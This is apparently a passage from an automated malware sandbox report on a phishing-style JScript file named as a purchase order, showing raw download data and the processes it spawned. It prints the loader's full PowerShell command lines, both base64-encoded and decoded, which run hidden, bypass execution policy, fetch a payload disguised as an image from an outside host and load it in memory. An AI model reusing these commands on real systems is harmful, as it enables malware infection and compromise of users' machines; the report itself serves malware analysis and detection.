                                                                                                                                          2024-12-14 13:00:42 UTC1237INData Raw: 37 61 39 34 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35
                                                                                                                                          Data Ascii: 7a94AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 50 34 67 44 4f 6f 67 44 4a 34 51 78 4e 38 66 44 39 33 41 2f 4e 73 66 44 36 33 67 39 4e 55 66 44 78 33 77 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 54 33 77 7a 4e 34 63 44 4b 33 41 78 4e 49 63 44 42 33 41 67 4e 38 62 44 37 32 67 75 4e 59 62 44 77 32 67 72 4e 30 61 44 73 32 41 71 4e 63 61 44 6a 32 51 6e 4e 73 5a 44 61 32 67 6c 4e 55 5a 44 52 32 77 69 4e 6b 59 44 49 32 41 68 4e 4d 55 44 39 31 41 66 4e 73 58 44 36 31 41 5a 4e 49 57 44 68 41 41 51 41 6b 42 67 42 41 44 41 41 41 73 44 61 37 51 47 4d 77 41 41 41 41 41 42 41 47 41 4c 41 37 41 7a 4f 6f 6f 44 31 36 41 74 4f 41 72 44 6d 36 67 6e 4f 55 70 44 50 36 67 6a 4f 6f 6f 44 45 35 41 65 4f 49 6e 44 72 35 67 61 4f 49 6d 44 68 35 41 59 4f 38 42 41 41 41 41 44 41 47 41
                                                                                                                                          Data Ascii: P4gDOogDJ4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZNIWDhAAQAkBgBADAAAsDa7QGMwAAAAABAGALA7AzOooD16AtOArDm6gnOUpDP6gjOooDE5AeOInDr5gaOImDh5AYO8BAAAADAGA
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 36 51 74 4f 4d 72 44 78 36 77 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33 77 2b 4e 6b 66 44
                                                                                                                                          Data Ascii: 6QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 67 66 4e 77 58 44 36 31 41 65 4e 59 58 44 30 31 67 63 4e 41 58 44 75 31 41 62 4e 6f 57 44 6f 31 67 5a 4e 51 57 44 69 31 41 59 4e 34 56 44 63 31 67 57 4e 67 56 44 57 31 41 56 4e 49 56 44 51 31 67 54 4e 77 55 44 4b 31 41 53 4e 59 55 44 45 31 67 51 4e 41 51 44 2b 30 41 50 4e 6f 54 44 34 30 67 4e 4e 51 54 44 79 30 41 4d 4e 34 53 44 73 30 67 4b 4e 67 53 44 6d 30 41 4a 4e 49 53 44 67 30 67 48 4e 77 52 44 61 30 41 47 4e 59 52 44 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41
                                                                                                                                          Data Ascii: gfNwXD61AeNYXD01gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKNgSDm0AJNISDg0gHNwRDa0AGNYRDU0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDA
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 6e 4f 30 70 44 62 36 51 6d 4f 63 70 44 56 36 77 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 6c 33
                                                                                                                                          Data Ascii: nO0pDb6QmOcpDV6wkOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDl3
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 41 49 42 51 42 51 41 41 41 41 38 54 30 2f 45 68 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d 47 42 44 4d 77 6b
                                                                                                                                          Data Ascii: AIBQBQAAAA8T0/EhPA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIMGBDMwk
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 44 5a 54 47 30 30 78 4d 4e 4e 6a 4c 7a 77 67 4d 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32 6f 54 4a 36 6b 68
                                                                                                                                          Data Ascii: DZTG00xMNNjLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2oTJ6kh
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 52 6a 50 30 49 43 4e 50 4d 44 36 7a 49 74 4d 65 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45 6a 48 41 41 41 41
                                                                                                                                          Data Ascii: RjP0ICNPMD6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 44 78 77 38 4c 4d 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f
                                                                                                                                          Data Ascii: Dxw8LM5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/


                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:08:00:10
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js"
                                                                                                                                          Imagebase:0x7ff6e4620000
                                                                                                                                          File size:170'496 bytes
                                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:08:00:14
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js
                                                                                                                                          Imagebase:0x7ff6e4620000
                                                                                                                                          File size:170'496 bytes
                                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:08:00:15
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAHAAZQByAHYAYQBzAGkAdgBlAG4AZQBzAHMAZQBzACkAOwAkAHYAdQBsAGMAYQBuAGkAcwBtAHMAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApADsAJAB2AHUAbABjAGEAbgBpAHMAbQBzAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAnADAALwB0AEIAYwBEAGkALwByAC8AZQBlAC4AZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaAAnACwAIAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACAAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAgACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAIAAnAE0AUwBCAHUAaQBsAGQAJwAsACAAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAgACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACcAMQAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcAKQApADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsA';$asphyxiation = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($forsakers));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $asphyxiation
                                                                                                                                          Imagebase:0x7ff63c0a0000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:08:00:15
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff704000000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:08:00:17
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                                                                                                                                          Imagebase:0x7ff63c0a0000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

